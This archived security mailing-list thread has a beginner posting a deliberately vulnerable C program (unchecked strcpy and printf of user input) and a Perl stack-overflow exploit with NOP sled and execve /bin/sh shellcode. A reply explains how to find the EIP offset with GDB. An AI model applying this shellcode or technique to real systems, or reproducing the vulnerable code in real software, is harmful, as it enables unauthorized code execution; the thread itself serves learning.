From: Sanjay R (2sanjayr@gmail.com)
Date: Sun Jan 13 2008 - 22:57:38 EST
Hi:
before writing your exploit code, you should check the length of the
buffer that will overwrite EIP. As you mentioned that u r a beginner
(like me!!), I advise you to always follow step-by-step approach. Once
you gain expertise, play with it as much as you like. so..u need to
do..
1. pass a randomely large string (1000 chars, with unique 4 chars group)
2. On getting segmentation fault, see the address in GDB
3. Since we have taken the unique substrings on leanght 4, you will be
able to find the substring (4 chars that overwrite the EIP). Count the
chars.
4. Now write your exploit code.
-sanjay
On 10 Jan 2008 02:09:46 -0000, <loki6@orange.nl> wrote:
> Hi there and thank you for reading this,
>
>
> I'm new in the pen-test area and want to study a simple buffer overflow exploit on debian 2.6.18-5-686.
>
>
> As I've said I'm new to this field and my goal is to be able to anticipate on possible buffer overflow exploits.
>
>
> I've created this simple script: "test.c" :
>
>
> [code]
>
>
> #include <stdio.h>
>
>
> int main(int argc, char **argv){
>
>
> char buffer[256];
>
>
> if (argc == 1) {
>
> printf("Usage: %s (input)", argv[0]);
>
> }
>
>
> strcpy(buffer, argv[1]);
>
> printf(buffer);
>
>
> return 0;
>
> }
>
>
> [/code]
>
>
>
>
> Then I'm trying to exploit it with:
>
>
>
>
>
> [code]
>
>
> #!/usr/bin/perl
>
>
> $ret = "/x90/x9a/xbf";
>
>
> $shellcode = "\xb0\x0b".
>
> "\x99".
>
> "\x52".
>
> "\x68\x2f\x2f\x73\x68".
>
> "\x68\x2f\x62\x69\x6e".
>
> "\x89\xe3".
>
> "\x52".
>
> "\x53".
>
> "\x89\xe1".
>
> "\xcd\x80";
>
>
>
> $exploit = "\x90" x 235;
>
> $exploit .= $shellcode;
>
> $exploit .= $ret;
>
>
> system("./a.out $exploit");
>
>
> [/code]
>
>
>
> The shellcode is an execve /bin/sh.
>
> When I run the perl script it simply returns my bash prompt. So the exploit didn't work.
>
>
> When I type 'exit' afterwards, I'm dropped from my su shell I was in previously, confirming there isn't a "/bin/sh" process.
>
>
> Now the funny thing is when I overflow the buffer of a.out in gdb, with:
>
>
>
> run `perl -e 'print "A"x262'`
>
> Program received signal SIGSEGV, Segmentation fault
>
> 0x08048412 in main ()
>
>
> It doesn't overflow the EIP, because when I use:
>
> i r
>
>
> It says:
>
>
> eip 0x8048412 0x8048412 <main+126>
>
>
>
> The first time I tried today it overflowed the EIP correctly and I didn't change anything.
>
>
> ECX is 0x41414141 and
>
> ESP is 0x4141413d
>
> EBP is 0xbf004141
>
>
> Since stack and frame pointer both have 41 in them I figure part of them is overflowed. Why not the Extended Instruction Pointer?
>
>
> I was wondering if someone was able to help me with this, because I really want to get the hang of this.
>
>
> I don't know if I got the NOP sled and return address right either, because when using GDB:
>
>
>
> x/s $esp
>
>
> I get:
>
>
> 0x4141413d: <Address 0x4141413d out of bounds
>
>
> I'm kinda stuck from there.
>
>
> My problem in short:
>
>
> - How do I get a reliable return address with GDB
>
> - How do I determine the length of the NOP sled
>
> - How do I test shellcode
>
>
>
> Thanks for reading this..
>
> Thanks for any help, pointers and advice.
>
>
> ironmonkey6
>
> ------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Need to secure your web apps NOW?
> Cenzic finds more, "real" vulnerabilities fast.
> Click to try it, buy it or download a solution FREE today!
>
> http://www.cenzic.com/downloads
> ------------------------------------------------------------------------
>
>
-- Computer Security Learner ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:20 EDT